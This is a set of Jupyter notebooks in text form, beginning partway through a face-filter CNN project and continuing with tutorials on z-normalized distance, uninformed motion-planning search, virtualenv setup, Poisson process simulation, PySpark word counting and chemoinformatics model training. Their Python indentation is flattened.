# would be represented in the data set as 0.2, or 20% of the way through the image. The helper function `center_in_pixels`
# defined below will help translate these percentages into pixels, and the `show_face` function below it will allow us to
# see what one of the images in the dataset looks like, and will also draw a red dot on the face center.
# + pycharm={"name": "#%%\n"}
def center_in_pixels(face: np.ndarray, point: np.ndarray) -> np.ndarray:
""" Helper function for converting a point in percentage to a point in pixels. """
return np.array([[point[0] * face.shape[1]], [point[1] * face.shape[0]]])
def show_face(face: np.ndarray, point: np.ndarray):
""" Helper function to show a face a draw a red dot at the center. """
plt.imshow(face, cmap='gray')
plt.scatter(*point, c='red')
demo_index = 0
show_face(raw_face_data[demo_index], center_in_pixels(raw_face_data[demo_index], raw_point_data[demo_index]))
# -
# We now have all the data represented in a way that is easy to work with, but it is still not in a format a machine
# learning model can understand. In order to convert each image into this format, we need to standardize each image's
# resolution, aspect ratio, color channels, and more.
#
# We decided that each image should be represented by a 120x120 black and white image, which implies a 1:1 aspect ratio.
# We also decided that each color should be represented by a value between 0 and 1 so it is easier for the model to
# understand, where as right now it is an integer between 0 and 255.
#
# The function `process_face` below does all this, and the function `process_faces` below that applies the `process_face`
# function to a list of faces and points.
# + pycharm={"name": "#%%\n"}
IMAGE_SIZE = 120
def process_face(face: np.ndarray, point: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
# Delete the alpha channel if one exists.
if face.shape[2] == 4:
face = np.delete(face, np.s_[3], 2)
# Average all the other channels together to create a black and white image.
face = np.mean(face, 2)
# Convert box coordinates to pixels.
pixel_box = center_in_pixels(face, point)
# Make the image a square.
if face.shape[0] > face.shape[1]:
face = np.pad(face, ((0, 0), (0, face.shape[0] - face.shape[1])), 'constant')
else:
face = np.pad(face, ((0, face.shape[1] - face.shape[0]), (0, 0)), 'constant')
# Resize to a more reasonable size.
pixel_box = np.array([
int(pixel_box[0] * (IMAGE_SIZE / face.shape[1])),
int(pixel_box[1] * (IMAGE_SIZE / face.shape[0])),
])
face = np.array(Image.fromarray(face).resize((IMAGE_SIZE, IMAGE_SIZE))) / 255
return face, pixel_box
def process_faces(faces: np.ndarray, points: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
processed_faces = []
processed_points = []
for face, point in zip(faces, points):
processed_face, processed_point = process_face(face, point)
processed_faces.append(processed_face)
processed_points.append(processed_point)
return np.array(processed_faces), np.array(processed_points)
# -
# We can now call the function on the face and point data, and view the same image as before to see the difference.
# + pycharm={"name": "#%%\n"}
generated_data_added = False
face_data, point_data = process_faces(raw_face_data, raw_point_data)
show_face(face_data[demo_index], point_data[demo_index])
# -
# Now that the data is cleaned, we can explore it even more. For example, lets see where all of the face center points are
# located by plotting all of them in a scatter plot.
# + pycharm={"name": "#%%\n"}
def show_scatter():
plt.scatter(
[point[0] for point in point_data],
[point[1] for point in point_data],
c='red',
)
show_scatter()
# -
# The first thing we notice is that many of the data points are clumped in the center, which is not good for our project
# because it is not always the case that the users's face will be in the exact center of the screen. Before we even
# started training our model, this was our first hint that we will eventually need more data.
#
# Next, we add our generated data that was generated by the `main.py` script running in datagen mode. No cleaning is
# required since the data generated by the script is already in the desired format. The code below loads in each generated
# dataset and concatenates it with the current data.
#
# **Note**: We have not committed these files to the repository because we felt it was too personal and did not want it
# public on the internet.
# + pycharm={"name": "#%%\n"}
def add_dataset(faces_path: str, points_path: str):
global face_data, point_data
face_data = np.concatenate((face_data, np.load(faces_path)))
point_data = np.concatenate((point_data, np.load(points_path)))
if generated_data_added:
print('Generated data has already been added to the dataset. Skipping...')
else:
add_dataset('generated_data/josh_room_faces.npy', 'generated_data/josh_room_points.npy')
add_dataset('generated_data/josh_kitchen_faces.npy', 'generated_data/josh_kitchen_points.npy')
add_dataset('generated_data/josh_bathroom_faces.npy', 'generated_data/josh_bathroom_points.npy')
add_dataset('generated_data/tiffany_room_faces.npy', 'generated_data/tiffany_room_points.npy')
add_dataset('generated_data/david_living_room_faces.npy', 'generated_data/david_living_room_points.npy')
generated_data_added = True
# -
# We can now see what the last data point in the dataset looks like, which happens to be of my father.
# + pycharm={"name": "#%%\n"}
show_face(face_data[-1], point_data[-1])
# -
# We can also now see the same scatter plot as above, but with the added data, which now looks much more spread out.
# + pycharm={"name": "#%%\n"}
show_scatter()
# -
# ### Model Analysis
#
# Since the input to our project is image data, it makes the most sense to use a convolutional neural network. This choice
# was immediately justified when we tried our first, simple CNN model, which yielded surprisingly accurate results, with
# an accuracy score of 96% after only 20 epochs.
#
# This simple CNN model uses just two convolutional layers, each relu activation (since relu usually works well for CNNs).
# Following each convolutional layer is a max pooling layer and batch normalization, which are both standard for CNNs.
# This is then followed by a flatten layer, which is needed since our output is 1-dimensional, and a final dense layer so
# we can view the output. Lastly, we used the adam optimizer since this is also a great optimizer for CNNs in general, and
# mean square error as a loss function since this our output is simply a point on a 2-dimensional grid.
#
# To test the model, the final cell in this notebook saves the current model to a file, which is read by the main.py
# script. We can test how well the model works by plugging it directly into our project's frontend and seeing how it
# performs.
# + pycharm={"name": "#%%\n"}
model = Sequential([
# Note: Even though there only one color channel, Keras still requires the input to be 3 dimensional.
Conv2D(32, (3, 3), activation='relu', input_shape=(120, 120, 1)),
MaxPooling2D(2, 2),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu'),
MaxPooling2D(2, 2),
BatchNormalization(),
Flatten(),
Dense(2, activation='relu'),
])
model.compile(optimizer='adam', loss='mse', metrics=['accuracy'])
model.fit(face_data.reshape((len(face_data), IMAGE_SIZE, IMAGE_SIZE, 1)), point_data, epochs=20)
# + [markdown] pycharm={"name": "#%% md\n"}
# However, the model above severely over fit due to the small amount of convolutional layers, dense layers, and lack of
# dropout layers. Our second model fixed these issues by adding more convolutional layers, an additional dense layer, and
# a dropout layer. All other parts of the model including activation functions, optimizers, and loss function is the same.
# We trained this model for 50 epochs instead of 20 like the model above because we were not as worried about over
# fitting.
#
# Although it is hard to document, we also tuned certain hyperparameters during this step like the amount of filters and
# the kernel size in each convolutional layer, the pool size in each max pooling layer, and the amount of units in the
# second to last dense layer. We finally decided on the following values since they gave us the best performance after
# some trial and error.
# + pycharm={"name": "#%%\n"}
model = Sequential([
# Note: Even though there only one color channel, Keras still requires the input to be 3 dimensional.
Conv2D(32, (3, 3), activation='relu', input_shape=(120, 120, 1)),
MaxPooling2D(2, 2),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu'),
MaxPooling2D(2, 2),
BatchNormalization(),
Conv2D(128, (3, 3), activation='relu'),
MaxPooling2D(2, 2),
BatchNormalization(),
Flatten(),
Dropout(0.25),
Dense(64, activation='relu'),
Dense(2, activation='relu'),
])
model.compile(optimizer='adam', loss='mse', metrics=['accuracy'])
model.fit(face_data.reshape((len(face_data), IMAGE_SIZE, IMAGE_SIZE, 1)), point_data, epochs=50)
# + [markdown] pycharm={"name": "#%% md\n"}
# This model maintained a good accuracy score while not over fitting as much, so we decided to use it as our final model.
#
# The code below saves the model to a file so it can be read by the main.py file.
# + pycharm={"name": "#%%\n"}
model.save('model.h5')
print('Model saved to {}/model.h5.'.format(os.getcwd()))
# + [markdown] pycharm={"name": "#%% md\n"}
# ### Conclusion
#
# Face Filter was created to detect faces in images and apply a filter to them, and our code in this notebook combined
# with the code in main.py does exactly that. Our project started by downloading, cleaning up and reformatting the data,
# which included writing a tool for generating our own data to support it. We then tried many different convolutional
# neural networks and tuned their hyperparameters to see what worked and what didn't work. The model we eventually landed
# on is properly tuned to be accurate while still not over fitting.
#
# We learned a lot during this project. There was a lot of image manipulation involved, which required learning many numpy
# functions for manipulating arrays of raw image data. Additionally, we probably went through more iterations of our
# convolutional neural network than any homework or kaggle competition, which really taught us what effects each
# hyperparameter has on the model's overall performance. Armed with this knowledge, we feel like we could create a CNN for
# just about anything now.
#
# There are many improvements we could have made to our project if we had more time. First off, while our model worked
# well overall, it still has much room for improvement. We still have a relatively large margin of error, at least
# compared to big companies like Facebook, Snapchat, or TikTok. Having more data would probably fix this, as the 300
# samples we ended with is still not much for a convolutional neural network. Additionally, we could improve our project
# by adding support for multiple faces, which would not be too hard considering our original dataset is already set up for
# multiple faces. Lastly, we could improve our frontend by adding more filters, allowing users to take pictures and save
# them (outside of datagen mode), and even make this a mobile app like Snapchat.
|
Project.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Pearson Correlation Vs. Z-normalized Euclidean Distance
#
# It is [well understood](https://arxiv.org/pdf/1601.02213.pdf) that the z-normalized Euclidean distance, $ED_{z-norm}$, and the Pearson correlation, $PC$, between any two subsequences with length $m$ share the following relationship:
#
# $ED_{z-norm} = \sqrt {2 * m * (1 - PC)}$
#
# Naturally, when the two subsequences are perfectly correlated (i.e., $PC = 1$), then we get:
#
# \begin{align}
# ED_{z-norm} ={}&
# \sqrt {2 * m * (1 - PC)}
# \\
# ={}&
# \sqrt {2 * m * (1 - 1)}
# \\
# ={}&
# \sqrt {2 * m * 0}
# \\
# ={}&
# \sqrt {0}
# \\
# ={}&
# 0
# \\
# \end{align}
#
# Similarly, when the two subsequences are completely uncorrelated (i.e., $PC = 0$), then we get:
#
# \begin{align}
# ED_{z-norm} ={}&
# \sqrt {2 * m * (1 - PC)}
# \\
# ={}&
# \sqrt {2 * m * (1 - 0)}
# \\
# ={}&
# \sqrt {2 * m * 1}
# \\
# ={}&
# \sqrt {2 * m}
# \\
# \end{align}
#
# In other words, the largest possible z-normalized distance between any pair of subsequences with length $m$ is $\sqrt{2 * m}$. The maximum distance can never be bigger!
#
# Finally, when two subsequences are anti-correlated (i.e., $PC = -1$), then we get:
#
# \begin{align}
# ED_{z-norm} ={}&
# \sqrt {2 * m * (1 - PC)}
# \\
# ={}&
# \sqrt {2 * m * (1 - (-1))}
# \\
# ={}&
# \sqrt {2 * m * 2}
# \\
# ={}&
# \sqrt {4 * m}
# \\
# ={}&
# 2 * \sqrt {m}
# \\
# \end{align}
#
# Note that while $2 * \sqrt {m}$ (i.e., anti-correlated) is obviously larger than $\sqrt {2m}$ (i.e., uncorrelated), it is basically impossible for a matrix profile distance to be "worse" than uncorrelated (i.e., larger than $\sqrt {2m}$) due to the fact that it is defined as the distance to its one-nearest-neighbor. For example, given a subsequence `T[i : i + m]`, the matrix profile is supposed to return the z-norm distance to its one-nearest-neighbor. So, even if there existed another z-norm subsequence, `T[j : j + m]`, along the time series that was perfectly anti-correlated with `T[i : i + m]`, then any subsequence that is even slightly shifted away from location `j` must have a smaller distance than $2 * \sqrt {m}$. Therefore, a perfectly anti-correlated subsequence would/could (almost?) never be a one-nearest-neighbor to `T[i : i + m]` especially if `T` is long.
|
docs/Pearson.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Tutorial: Uninformed Search Algorithms
#
# This tutorial shows how we can combine motion primitives of vehicles, i.e., short trajectory segments, with uninformed search algorithms to find feasible trajectories that connect the **initial state** and the **goal region** of a given planning problem.
# ## 0. Preparation
# Before you proceed with this tutorial, make sure that
#
# * you have gone through the tutorial for **CommonRoad Input-Output**.
# * you have installed all necessary modules for **CommonRoad Search** according to the installation manual.
#
# Let's start with importing relevant modules and classes for setting up the automaton and the CommonRoad (CR) scenario.
# +
# %matplotlib inline
# %load_ext autoreload
# %autoreload 2
import os
import sys
path_notebook = os.getcwd()
# add the SMP folder to python path
sys.path.append(os.path.join(path_notebook, "../../"))
# add the 1_search_algorithms folder to python path
sys.path.append(os.path.join(path_notebook, "../"))
import matplotlib.pyplot as plt
from commonroad.common.file_reader import CommonRoadFileReader
from commonroad.visualization.mp_renderer import MPRenderer
from SMP.motion_planner.motion_planner import MotionPlanner
from SMP.maneuver_automaton.maneuver_automaton import ManeuverAutomaton
from SMP.motion_planner.utility import plot_primitives, display_steps
# -
# ## 1. Loading CR Scenario and Planning Problem
# In the next step, we load a CommonRoad scenario and its planning problem, which should be solved with the search algorithms. The meaning of the symbols in a scenario are explained as follows:
# * **Dot**: initial state projected onto the position domain
# * **Red rectangle**: static obstacle
# * **Yellow rectangle**: goal region projected onto the position domain
# +
# load scenario
path_scenario = os.path.join(path_notebook, "../../scenarios/tutorial/")
id_scenario = 'ZAM_Tutorial_Urban-3_2'
# read in scenario and planning problem set
scenario, planning_problem_set = CommonRoadFileReader(path_scenario + id_scenario + '.xml').open()
# retrieve the first planning problem in the problem set
planning_problem = list(planning_problem_set.planning_problem_dict.values())[0]
# plot the scenario and the planning problem set
plt.figure(figsize=(15, 5))
renderer = MPRenderer()
scenario.draw(renderer)
planning_problem_set.draw(renderer)
plt.gca().set_aspect('equal')
plt.margins(0, 0)
renderer.render()
plt.show()
# -
# ## 2. Generating a Maneuver Automaton
#
# In the following, we load the pre-generated motion primitives from an XML-File, and generate a **Maneuver Automaton** out of them.
# The maneuver automaton used for this tutorial consists of 7 motion primitives; the connectivity within the motion primitives are also computed and stored. Some additional explanations on the motion primitives:
# * The motion primitives are generated for the *Kinematic Single Track Model* (see [Vehicle Model Documentation](https://gitlab.lrz.de/tum-cps/commonroad-vehicle-models/-/blob/master/vehicleModels_commonRoad.pdf)) with parameters taken from vehicle model *BMW320i* (id_type_vehicle=2).
# * The motion primitives have a constant driving velocity of 9 m/s, varying steering angles with constant steering angle velocity, and a duration of 0.5 seconds. We assume constant input during this period.
# * The motion primitives are generated for all combinations of the steering angles of values 0 rad and 0.2 rad at the initial state and the final state, thereby producing 2 (initial states) x 2 (final states) = 4 primitives. Except for the primive moving straight (with 0 rad steering angle at the initial and the final states), the remaining 3 left-turning primitives are mirrored with regard to the x-axis, resulting in a total number of 7 motion primitives.
# * Two motion primitives are considered connectable if the velocity and the steering angle of the final state of the preceding primitive are equal to those of the initial state of the following primitive.
# +
# load the xml with stores the motion primitives
name_file_motion_primitives = 'V_9.0_9.0_Vstep_0_SA_-0.2_0.2_SAstep_0.2_T_0.5_Model_BMW_320i.xml'
# generate automaton
automaton = ManeuverAutomaton.generate_automaton(name_file_motion_primitives)
# plot motion primitives
plot_primitives(automaton.list_primitives)
# -
# ## 3. Search algorithms
# Next, we demonstrate the search results for the following algorithms:
# 1. Breadth-First Search (BFS)
# 2. Depth-First Search (DFS)
# 3. Depth-Limited Search (DLS)
# 4. Uniform-Cost Search (UCS)
#
# For each of the algorithms, we create a corresponding motion planner implemented in the **MotionPlanner** class, with the scenario, the planning problem, and the generated automaton as the input. The source codes are located at **SMP/motion_planner/search_algorithms/**
#
# After executing the code block for every algorithm, you will see a **"visualize"** button directly beneath the **"iteration"** slider. Click the **"visualize"** button and let the search algorithm run through; once it's completed, you can use the slider to examine all intermediate search steps. Meaning of colors and lines are explained as follows:
# * **Yellow solid:** frontier
# * **Yellow dashed:** collision
# * **Red solid:** currently exploring
# * **Gray solid:** explored
# * **Green solid:** final solution
# ### 3.1 Breadth-First Search (BFS)
# The BFS algorithm uses a FIFO (First-In First-Out) queue for pushing the nodes.
# +
# construct motion planner
planner_BFS = MotionPlanner.BreadthFirstSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_BFS.state_initial, planner_BFS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_BFS.execute_search,
config=planner_BFS.config_plot)
# -
# ### 3.2 Depth-First Search (DFS)
# The DFS algorithm uses a LIFO (Last-In First-Out) queue for pushing the nodes.
# +
# construct motion planner
planner_DFS = MotionPlanner.DepthFirstSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_DFS.state_initial, planner_DFS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_DFS.execute_search,
config=planner_DFS.config_plot)
# -
# In this scenario, we were lucky enough to find a solution using DFS. However, the DFS is not complete, i.e., DFS is not guaranteed to find a solution if one exist. To justify our claim, we slightly manipulate the scenario, such that the goal region is shifted for 4 m in the y-axis, and re-run the search.
# +
import numpy as np
# read in scenario and planning problem set
scenario, planning_problem_set = CommonRoadFileReader(path_scenario + id_scenario + '.xml').open()
# retrieve the first planning problem in the problem set
planning_problem = list(planning_problem_set.planning_problem_dict.values())[0]
for state in planning_problem.goal.state_list:
state.position = state.position.translate_rotate(np.array([0, 4]), 0)
# Plot the scenario and the planning problem set
plt.figure(figsize=(15, 5))
renderer = MPRenderer()
scenario.draw(renderer)
planning_problem_set.draw(renderer)
plt.gca().set_aspect('equal')
plt.margins(0, 0)
renderer.render()
plt.show()
# +
# construct motion planner
planner_DFS = MotionPlanner.DepthFirstSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_DFS.state_initial, planner_DFS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_DFS.execute_search,
config=planner_DFS.config_plot)
# -
# As you can see, in this case DFS was not able to find a solution, since DFS would go infinitely deep when appending motion primitives (leading to infinite state space). **Question**: is this also the case with BFS? You can test it out.
#
# To overcome this problem, we introduce a depth limit, resulting in Depth-Limited Search (DLS).
# ### 3.3 Depth-Limited Search (DLS)
#
# Now let's run the algorithm and see what changes with the introduced depth limit. Here we set the limit to 7, as we know from the result of BFS that there exists a solution consisting of 7 motion primtives.
# +
limit_depth = 7
# construct motion planner
planner_DLS = MotionPlanner.DepthLimitedSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_DLS.state_initial, planner_DLS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_DLS.execute_search,
config=planner_DLS.config_plot, limit_depth=limit_depth)
# -
# As you can see, DLS now finds a solution. **Question**: what happends if you have a lower or higher depth limit? Try it out.
# ### 3.4 Uniform-Cost Search (UCS)
#
# The algorithms we have considered so far do not consider any cost during the search process. In the following, we look at the Uniform-Cost Search. UCS is optimal for any step costs, as it expands the node with the lowest path cost g(n). In this example, the cost is set to the time to reach the goal. Thus, our cost g(n) is the time it took to reach our current final state.
#
# UCS is based on the Best-First Search algorithm, which we will also use for Greedy-Best-First Search and A\* Search in the next tutorial. These algorithms only differ in their evaluation function: in UCS, the evaluation function is f(n) = g(n).
# +
# read in scenario and planning problem set
scenario, planning_problem_set = CommonRoadFileReader(path_scenario + id_scenario + '.xml').open()
# retrieve the first planning problem in the problem set
planning_problem = list(planning_problem_set.planning_problem_dict.values())[0]
# construct motion planner
planner_UCS = MotionPlanner.UniformCostSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_UCS.state_initial, planner_UCS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_UCS.execute_search,
config=planner_UCS.config_plot)
# + [markdown] pycharm={"name": "#%% md\n"}
# ## Congratulations!
#
# You have finished the tutorial on uninformed search algorithms! Next, you can proceed with the tutorial on informed search algorithms.
|
tutorials/1_search_algorithms/tutorial_uninformed_search.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
pip freeze
# 查詢現有 Python 套件清單及其版本
pip install virtualenv
# 安裝創建虛擬環境的必備套件 `virtualenv`
virtualenv venv -p \
C:\Users\lucaslin\AppData\Local\Programs\Python\Python36-32\python.exe
# 基於現有的 Python 執行檔來創建該 Python 版本的虛擬環境
#
# 並將此虛擬環境命名為 `venv`
#
# 註:第一行最後面的 \ 是 Python 換行符號
# +
# linux/Mac
source venv/bin/activate
deactivate
# Windows
.\venv\Scripts\activate.bat
.\venv\Scripts\deactivate.bat
# -
# 啟動和關閉虛擬環境
pip install Flask
pip install Flask-RESTful
pip install Flask-JWT
# 啟動虛擬環境後,指令列最前面會出現 `(venv)`
#
# 再安裝需要的套件
|
Create Virtual Environment.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import matplotlib.pyplot as plt
# # Generating samples from a **Homogeneous** Poisson process
#
# A Poisson process generates a series of events. In many situations it can be useful to simulate data generated from a Poisson process. This notebook goes through some examples of how to do this.
#
# For a **homogeneous** process, we describe the process by a rate of events in a time window, $\lambda$. The count (number) of events observerd is distributed as a $\text{Poisson}(\lambda T)$ where $T$ is the length of the window of observation. The time between each event ("inter-event interval") is distributed as an $\text{Exponential}(\frac{1}{\lambda T})$.
# +
# Describe our Poisson process
L = 10 # event rate (Hz )
T = 1 # duration during which events occur (s)
# We will observe the process a large number of times (to test efficiency)
K = 100000 # number of trials of random process
# -
# ### Three methods:
# - Generate using a Bernoulli approximation with very small bins of time.
# - Generate ISIs from an exponential RV.
# - Generate using Poisson and Uniform trick
# +
# %%time
# Generating using bernoulli approximation
nbins = 1000
DeltaT = 1/nbins
RateVector = L * DeltaT / T
Data = np.random.rand(nbins,K).T < RateVector
spiketimes_bernoulli = []
for k in range(K):
spiketimes_bernoulli.append(np.nonzero(Data[k,:])[0]/nbins*T)
# +
# %%time
# Generate using exponential RV
spiketimes = []
for k in range(K):
sample = np.random.exponential(1/L,50) ## NOTE - 50 might not be enough!!
assert(np.sum(sample) > T)
if (sample[0] > T): # (We observed no events)
spiketimes.append([])
else:
lastindex = np.argwhere(np.cumsum(sample) < T)[-1][0]
spiketimes.append(np.cumsum(sample[:lastindex]))
# +
# %%time
# Generate using Poisson and Uniform trick
Events = np.random.poisson(L,K)
spiketimes = []
for k in range(K):
spiketimes.append(np.sort(np.random.rand(Events[k])*T))
# -
# Show one example event
plt.stem(spiketimes[0],np.ones(len(spiketimes[0])), use_line_collection=True)
plt.gca().set_xlim(0,T)
# +
# Show that our events have exponential ISIs
ISIs = []
for k in range(K):
if len(spiketimes[k]) == 0:
continue
ISIs.append(spiketimes[k][0])
ISIs.extend(np.diff(np.array(spiketimes[k])).tolist())
import seaborn as sns
sns.distplot(np.array(ISIs),100, kde=False);
# +
# Show something more interesting - that our events are equally likely across T
AllEventTimes = np.hstack(spiketimes)
nHistBins = 100
HistBins = np.linspace(0,T,nHistBins + 1)
BinDuration = T/nHistBins
vals, bin_edges = np.histogram(AllEventTimes,bins=HistBins)
EventRate = vals / K / BinDuration # Number of events observed in each bin / Number of Observations / BinDuration
plt.plot(HistBins,np.ones(HistBins.shape) * L, 'r', label='Expected Rate = 10 Hz')
plt.gca().set_ylabel('Observed rate in small bins (Hz)')
plt.gca().legend()
plt.bar(HistBins[:-1] + BinDuration/2, EventRate ,width=BinDuration)
# -
# # Generating samples from an **Inhomogeneous** Poisson process
#
# An inhomogeneous Poisson process is like a Poisson process, but the rate changes as a function of time, i.e., $\lambda(t)$. In any window, the count of events is still Poisson, but now it is described by $\text{Poisson}(\int_0^T \lambda(t) dt)$. The interevent intervals are no longer Exponentially distributed. Generating simulated data for an inhomogeneous Poisson process is a bit more complicated, but not too much!
# ### Three methods:
# - Generate using a Bernoulli approximation with very small bins of time. *(Still works!)*
# - Generate using a homogeneous Poisson process and *deletion*
# - Generate ISIs from an exponential RV and apply the time rescaling theorem **not shown**
# Let's define our rate function to be a ramp
def rate(t):
return 10*t
# ### Inhomogeneous Poisson Process Method 1: Bernouli approximation
# +
# %%time
# Generating using bernoulli approximation
nbins = 1000
DeltaT = 1/nbins
BinCenters = np.arange(0,1,DeltaT) + DeltaT/2
RateVector = rate(BinCenters) * DeltaT
Data = np.random.rand(nbins,K).T < RateVector
inh_spiketimes_bernoulli = []
for k in range(K):
inh_spiketimes_bernoulli.append(np.nonzero(Data[k,:])[0]/nbins*T)
# +
# Plot observed event rate in small bins
AllInhEventTimes = np.hstack(inh_spiketimes_bernoulli)
nHistBins = 100
HistBins = np.linspace(0,T,nHistBins + 1)
BinDuration = T/nHistBins
vals, bin_edges = np.histogram(AllInhEventTimes,bins=HistBins)
EventRate = vals / K / BinDuration # Number of events observed in each bin / Number of Observations / BinDuration
plt.plot(HistBins,rate(HistBins+BinDuration/2), 'r', label='Expected Rate = Ramp to 10 Hz')
plt.gca().set_ylabel('Observed rate in small bins (Hz)')
plt.gca().legend()
plt.bar(HistBins[:-1] + BinDuration/2, EventRate ,width=BinDuration)
# -
# ### Inhomogeneous Poisson Process Method 2: Deletion!
#
# This technique relies on the fact that if we sample from a *homogeneous* Poisson process (with rate $\lambda_{max}$, we can go through and randomly delete spikes, and the results (if we chose the right probabilities to delete with) will still be Poisson. The key is that the probability that any spike observed at time $t_k$ should be deleted is $P_{delete} = \lambda(t_k) / \lambda_{max}$.
# +
# %%time
# First generate a homogeneous Poisson process with a rate at least as big as the maximum
# Inhomogeneous rate (Generate using Poisson and Uniform trick)
MaximumRate = 11 # You have to know this!
Events = np.random.poisson(MaximumRate,K)
spiketimes = []
for k in range(K):
spiketimes.append(np.sort(np.random.rand(Events[k])*T))
inh_spiketimes_deletion = []
# Then, go through each spike and potentially delete it!!
for k in range(K):
RateAtSpikeTime = rate(spiketimes[k])
DeletionRand = np.random.rand(*RateAtSpikeTime.shape)
inh_spiketimes_deletion.append(
np.delete(spiketimes[k], np.argwhere(DeletionRand > RateAtSpikeTime/MaximumRate)) )
# +
# Plot observed event rate in small bins
AllInhEventTimes = np.hstack(inh_spiketimes_deletion)
nHistBins = 100
HistBins = np.linspace(0,T,nHistBins + 1)
BinDuration = T/nHistBins
vals, bin_edges = np.histogram(AllInhEventTimes,bins=HistBins)
EventRate = vals / K / BinDuration # Number of events observed in each bin / Number of Observations / BinDuration
plt.plot(HistBins,rate(HistBins+BinDuration/2), 'r', label='Expected Rate = Ramp to 10 Hz')
plt.gca().set_ylabel('Observed rate in small bins (Hz)')
plt.gca().legend()
plt.bar(HistBins[:-1] + BinDuration/2, EventRate ,width=BinDuration)
|
Generating Poisson Random Variables.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python2
# ---
# <h1 align="center"> Word Count of Pride and Prejudice using PySpark </h1>
# +
import re, string
text_file = sc.textFile('Data/Pride_and_Prejudice.txt')
# -
# first 5 elements of the RDD
text_file.take(5)
type(u'lama')
string.punctuation
punc = '!"#$%&\'()*+,./:;<=>?@[\\]^_`{|}~'
def uni_to_clean_str(x):
converted = x.encode('utf-8')
lowercased_str = converted.lower()
# for more difficult cases use re.split(' A|B')
lowercased_str = lowercased_str.replace('--',' ')
clean_str = lowercased_str.translate(None, punc) #Change 1
return clean_str
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD = one_RDD.map(lambda x: (x,1))
one_RDD = one_RDD.reduceByKey(lambda x,y: x + y)
one_RDD.take(15)
one_RDD = text_file.map(lambda x: uni_to_clean_str(x))
one_RDD.take(5)
one_RDD = text_file.map(lambda x: uni_to_clean_str(x).split())
one_RDD.take(5)
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD.take(5)
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD = one_RDD.map(lambda x: (x,1))
one_RDD.take(5)
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD = one_RDD.map(lambda x: (x,1))
one_RDD = one_RDD.reduceByKey(lambda x,y: x + y)
one_RDD.take(15)
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD = one_RDD.map(lambda x: (x,1))
one_RDD = one_RDD.reduceByKey(lambda x,y: x + y)
one_RDD.take(5)
one_RDD = one_RDD.map(lambda x:(x[1],x[0]))
one_RDD.take(5)
one_RDD.sortByKey(False).take(15)
|
PySpark_Basics/PySpark_Part1_Word_Count_Removing_Punctuation_Pride_Prejudice.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# ## Import Libraries
# +
# Import libraries of interest.
# Numerical libraries
import sklearn #this is the main machine learning library
from sklearn.decomposition import PCA
import numpy as np #this is the numeric library
import scipy.stats as stats
#OS libraries
import urllib #this allows us to access remote files
import urllib2
import os
from collections import OrderedDict, defaultdict
import imp
import sys
#BCML libraries
from bcml.Parser import read_training as rt
from bcml.Parser import build_training as bt
from bcml.PubChemUtils import pubchempy_utils as pcp
from bcml.Chemoinformatics import chemofeatures as cf
from bcml.Train import train_model as tm
from bcml.Parser import read_testing as rtest
from bcml.Parser import build_testing as btest
# Visualization libraries
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from IPython.display import Image
# Explanability libraries
import lime
import lime.lime_tabular
# Chemistry libraries
indigo = imp.load_source('indigo', 'indigo-python-1.2.3.r0-mac/indigo.py')
indigo_renderer = imp.load_source('indigo_renderer', 'indigo-python-1.2.3.r0-mac/indigo_renderer.py')
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem import Draw
from IPython.display import display, Image
# -
# ## Train the model
class Train:
def __init__(self):
pass
def load(self, filename, identifier):
train = rt.Read(filename, identifier, id_name="PubChem")
# Load SDFs from NCBI
training_data = pcp.Collect(train.compounds, sdf=True, chunks=20, id_name='PubChem', predictors=train.predictors, proxy=None)
training_data = cf.Update(training_data, remove_static=False)
# Run PaDEL-Descriptor to extract 6150 substructural features
training_data.update(padel=True)
ids = [id for id, compound in dict.iteritems(OrderedDict(sorted(training_data.compound.items(), key=lambda t: t[0])))]
